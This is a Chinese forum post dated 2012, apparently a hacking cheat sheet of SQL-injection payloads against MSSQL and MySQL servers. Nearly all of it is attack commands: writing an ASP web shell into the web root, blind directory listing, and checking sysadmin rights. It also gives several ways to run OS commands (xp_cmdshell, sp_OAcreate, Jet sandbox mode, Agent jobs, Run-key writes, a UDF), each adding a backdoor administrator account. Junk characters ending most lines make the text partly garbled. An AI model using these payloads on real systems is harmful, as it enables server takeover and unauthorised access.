MSSQL语句导出一句话木马
6 s( W* r2 N" L) L首先确定网站的WEB路径
% ?) Z5 _ U5 Y9 S( R7 F8 r) V;create table pcguest(pc char(255));-- //建一个表用作插入一句话木马 h% ~# I0 g) \( `7 {$ c4 h, t
2 p- \) c6 ~7 K+ R. D5 R& ^
;insert into pcguest(pc) values ('%3c%25execute request(%22p%22)%25%3e');--
, I* J M! x( Q5 t//将一句话木马插入表中
% t0 n- h$ G9 }0 X9 s
' _) i9 v% t! M( G8 P% B;execute sp_makewebtask @outputfile='E:\Inetpub\wwwroot\PC.ASP',@query='select pc from pcguest';--
& ]" k; L1 }2 P( n//导出一个ASP文件. j( r" O0 G4 d1 h) {) H3 r
* L7 K" I" p |7 s" A w k2 s; ^9 _/ s0 n( o- S3 i: O
关于MSSQL列目录6 C1 N' V0 q5 j2 }' ~2 K6 |# ?
;CREATE TABLE pctest(subdirectory VARCHAR(100),depth VARCHAR(100),[file] VARCHAR(100)) //建一个新表( x0 z. x5 r; K4 w$ M8 k9 [
Insert pctest exec master..xp_dirtree "d:\app\",1,1 //用xp_dirtree列目录结果导入所建成的表5 p- {& X2 ?5 ]" X4 Q; a$ L
& M4 F3 B& h( Y8 W8 m1 c" H
and (select Count(1) from [pctest]) between 0 and 99 //判断表中字段数来知道有几个文夹和目录# @) c) _' k# r. m
4 E8 \1 g6 _. o7 S5 qAnd (Select Top 1 len(Cast([file] as varchar(8000))+subdirectory) From (Select Top 2 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 0 and 20 //猜解第二个字段
) u! R% }/ [- I# i' m4 M: t$ ^& W2 f9 h( e
And (Select Top 1 unicode(substring(Cast([file] as varchar(8000))+subdirectory,1,1)) From (Select Top 1 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 30 and 130 //逐一猜解字段名的每位字符
7 f6 q8 H6 Q" V/ C8 K( A. e% ?- Z' n. u: X, F
; t5 ]+ \0 D! u0 h k3 A! ]% W
数据库版本和权限查看6 T. y6 q0 c) r8 n# X8 \
and 1=(select @@VERSION) //查看详细的数据库信息.7 o0 g: i; K$ k: @+ B
and 1=(SELECT IS_SRVROLEMEMBER('sysadmin'));-- //查看权限是不是SA
9 x$ h" a2 l: C# ?- m. jand 1=(SELECT IS_MEMBER('db_owner'));-- //查看权限是不是DB_ONWER: \' E7 W M+ X
& g5 m# J/ J) x# I, F
5 k. t- K! I. i1.利用xp_cmdshell执行命令" s& V4 s" C# K2 o8 K' g8 g4 o) T9 M7 I
exec master..xp_cmdshell 'net user rfire 123456 /add'" y8 [. u" { ?0 x6 N# p) x
exec master..xp_cmdshell 'net localgroup administrators rfire /add'! |: D# u: l1 p1 o- o& h0 d
/ F6 v8 D7 A- P b/ K
恢复xp_cmdshell存储过程
9 }8 [+ [5 }% Y* G$ d/ Z1 R( K1 aExec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'5 s, P$ K; K C9 q! o6 D
" ~) `# _- J/ r: N4 w
6 z" b; k" ], Q1 \0 v" U2.利用SP_OAcreate和SP_OAMETHOD执行命令
, a @. Y- k6 M; p; x在wscript.shell组件存在的情况下以及xp_cmdshell和xplog70.dll都被删除的情况下
H8 q6 _6 u5 o2 r! F( IDECLARE @shell INT //建立一个@shell实体
" e3 G1 t' H: {. c/ _" J) s: ^EXEC SP_OAcreate 'wscript.shell',@shell out //创建OLE对象的实例/ O4 s% g* ?# f: `% g% @
EXEC SP_OAMETHOD @shell,'run',null,'net user rfire 123456 /add' //调用@shell这个实例
' F3 y6 G; J+ H; b& z% T: c: a o" u4 H, R' Q# d0 i
3 d$ C: p7 y+ l
3.利用沙盒模式
! O% O) [- I5 e先利用xp_regwrite(前提是要求xp_regwrite存在)改注册表,然后用OpenRowSet访问系统自身mdb文件,然后执行SQL语句。9 O2 R/ V0 [% ~2 z7 ^
开启沙盒模式:
$ H7 H i2 _7 a# w8 Z( w( ]EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engine','SandBoxMode','REG_DWORD',0
7 F, V1 C0 J/ o. ]2 i3 f) x$ ?9 g4 u, C
执行命令:
& N# \4 b. W" r BSelect * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net user rfire 123456 /add")');
- _' W+ W5 x4 ] w" n
! p! K* f! h7 [' @9 ^, z1 d+ B! h% ^' N5 g7 H) e5 T
4.利用SQL代理执行命令
* {6 U. w( t6 w8 p3 Z: w4 b- e; }3 yEXEC master.dbo.xp_servicecontrol 'start','SQLSERVERAGENT' //使用xp_servicecontrol启动SQLSERVERAGENT服务
/ _9 z8 K/ m/ \ l& T! U9 v! y& I! Y4 u; T
执行命令:7 B* Z* P# y$ z" C" z0 [) }" ^
use msdb exec sp_delete_job null,'x' //进入msdb数据库,删除x作业防止出错# Z8 T( F. j7 \8 U. }$ v
exec sp_add_job 'x': H& ?* X5 ^+ i- P
exec sp_add_jobstep Null,'x',Null,'1','CMDEXEC','cmd /c net user rfire 123456 /add' //添加作业
: ]' U; l5 a* `# ^exec sp_add_jobserver Null,'x',@@servername exec sp_add_job 'x' //启动这个作业
! l! g1 r u% p$ y
0 m: U- ~( r! g4 r6 q! `9 l5 d* o! ~6 c5 v6 T u
5.利用注册表项执行命令(用xp_regwrite将执行命令写入启动项)1 b0 v) Q1 }0 b- v. h3 ?9 d
EXEC master.dbo.xp_regwrite 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run\','shell'.'REG_SZ','C:\windows\system32\cmd.exe /c net user rfire 123456 /add'6 @+ A( M1 l" N3 W/ q9 |$ r; W1 e
4 L& Z6 f# a' d( c. @
* Z: `* d" H- U5 z$ m% R- J
6.MYSQL的命令执行+ K# [& @/ V7 @) M! Q
MYSQL的UDF自定义函数提权(要求账号拥有insert和delete权限)
1 V- ~0 R- {% G" h4 g5 S首先要在su.php下导出c:\windows\udf.dll% V( \4 n. B' k! p
导出后执行创建自定义函数命令:, P( e& T- G) p8 u
Create Function cmdshell returns string soname 'udf.dll'
/ W: v9 r8 B E4 S执行命令
+ ?$ j- T2 K9 iselect cmdshell('net user rfire 123456 /add')- e5 @( y% I( z! ]% C7 m |3 }
执行后删除函数 drop function cmdshell
' y1 @1 q/ t) G% I3 t |
发表于 2012-9-13 17:49:59
收藏
支持
反对